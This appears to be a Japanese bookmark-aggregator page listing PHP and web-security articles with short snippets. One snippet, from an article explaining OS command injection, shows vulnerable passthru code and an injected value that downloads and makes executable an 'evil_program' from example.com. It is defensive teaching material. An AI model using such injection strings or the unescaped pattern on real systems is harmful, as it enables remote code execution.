Creating a Cache-aware HTTP/2 Server Push Mechanism | CSS-Tricks
Get affordable and hassle-free WordPress hosting plans with Cloudways — start your free trial today. If you’ve been reading at all about HTTP/2, then you’ve likely heard about server push. If not, here’s the gist of it: Server push lets you preemptively send an asset when the client requests another. To use it, you need an HTTP/2-capable web server, and then you just set a Link header for the asse
It Turns Out, 2017 is the Year of Simply Secure PHP Cryptography - Paragon Initiative Enterprises Blog
The latest information from the team that develops cryptographically secure PHP software. Is Your Cryptography Reliable? Our team specializes in studying real world cryptography implementations to assure their correctness and security. Why You Want to Hire Our Company Contact Us Six months ago, I wrote a blog post titled Let's Make 2017 the Year of Simply Secure PHP Cryptography, which at the time
Kornel / babel-preset-php · GitLab
Babel preset for converting PHP syntax to JavaScript. It can run subset of PHP in the browser or in Node.js. Expanding Atwood's Law.
Capsule
Capsule Clean, concise, composable dependency injection for PHP 8. Installation Install Capsule via Composer: composer require capsule/di ^4.0 The Github repository is at capsulephp/di. Autowiring Container Capsule will auto-inject typehinted constructor parameters. use Capsule\Di\Container; use Capsule\Di\Definitions; class Foo implements FooInterface { public function __construct( protected Bar
$_GET と $_POST は不適切な名前である - Qiita
概要 HTTP GET と POST 以外のメソッドに対するスーパーグローバル変数の導入や $_POST を改善すべきかという PHP Internals の議論を読みました。以前の議論のリンクがまとまっているだけでなく、スーパーグローバル変数および HTTP 通信の仕様をどのように学ぶのかの情報がまとまっているので、記録に残しておくことにしました。同時に PSR-7 以降の議論についても記載しました。 スーパーグローバル変数の名前 $_GET $_GET は名前だけでは HTTP GET メッセージをあらわすものとして考えてしまいがちですが、実際には URI クエリパラメーターであり、GET リクエスト以外にも使うことができます。 $_POST $_POST はリクエストボディをあらわしますが、Content-Type ヘッダーの値が x-www-form-urlencoded もしくは
リモートコード実行の脆弱性 (CVE-2016-10074) に対応した SwiftMailer のセキュリティリリース - Qiita
概要 リモートコード実行の脆弱性 (CVE-2016-10074) に対応するために SwiftMailer 5.4.5 がリリースされました。脆弱性の条件に該当するプロジェクトはバージョンアップやアプリケーションの修正が求められます。 該当するプロジェクト sendmail もしくは sendmail と互換性があり、-X オプションが利用可能であるプログラムを使う (postfix は -X を無効にしている) From、Sender、ReturnPath フィールドの値にユーザーからの入力を使う lsmith さんのツイートによれば、Symfony の場合、transport で smtp の代わりに mail を使っているプロジェクトが該当します。 検証コード 脆弱性を説明するドキュメントに記載されているコードは次のようなものです。 // sender フィールドをもつ問い合わせフ
OSコマンドのエスケープ – シェルの仕様とコマンドの実装
(Last Updated On: )OSコマンドのエスケープの続きです。OSコマンドインジェクションを防ぐための、OSコマンドのエスケープはSQLのエスケープに比べるとかなり難しいです。 難しくなる理由は多くの不定となる条件に依存する事にあります。 OSコマンドを実行するシェルはシステムによって異なる シェルはプログラミング言語+複雑なエスケープ仕様を持っている(コマンド以後はクオートなしでも文字リテラルのパラメーター+各種展開処理) WebアプリはCGIインターフェースで動作するため環境変数にインジェクションできる コマンドパラメーターの取り扱いはコマンド次第である 実行されるコマンドの実装により、間接インジェクションが可能になる SQLの場合、出力先のシステムは一定です。PostgreSQL用にエスケープした文字列をMySQLで実行したり、MySQL用にエスケープした文字列をPost
OSコマンドのエスケープ
(Last Updated On: )プログラムからOSコマンドを実行する場合、エスケープ処理を行わないと任意コマンドが実行される危険性があります。 今回はOSコマンドのエスケープについてです。 OSコマンドインジェクション OSコマンドインジェクションはプログラムから実行するコマンドに、攻撃用文字列を挿入(インジェクション)して意図しないコマンドを実行させる攻撃です。 例えば、次のようなLinuxシステムのディレクトリの内容を表示させるプログラム <?php passthru('ls -l '.$_GET['dir']); (任意のディレクトリ内容を表示できる脆弱性はここでは考慮しない) に不正なコマンドを実行させるのはとても簡単です。$_GET[‘dir’]に . ; cd /tmp; wget http://example.com/evil_program; chmod 755 /t
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
escapeshellrce.md Paul Buonopane paul@namepros.com at NamePros PGP: https://keybase.io/zenexer I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome. This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's CVE-2016-10033, CVE-2016-10045, and CVE-2016-10074. It assumes prior understanding of these vulnerabilities. This
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
PHP: rfc:argon2_password_hash_enhancements
GitHub - paragonie/paseto: Platform-Agnostic Security Tokens
GitHub - walkor/workerman: An asynchronous event driven PHP socket framework. Supports HTTP, Websocket, SSL and other custom protocols.
GitHub - opentracing/opentracing-php: OpenTracing API for PHP
GitHub - shumkov/grpc-everywhere-php: PHP connector for GRPC everywhere server
GitHub - aidantwoods/SecureHeaders: A PHP library aiming to make the use of browser security features more accessible.
PHP: rfc:allow-abstract-function-override
GitHub - phpv8/php-v8: PHP extension for V8 JavaScript engine
Caddy で HTTP/2 と php-fpm を利用する - Qiita
PHP: rfc:request_response
GitHub - hnw/php-timecop: A PHP extension providing "time travel" capabilities inspired by ruby timecop gem
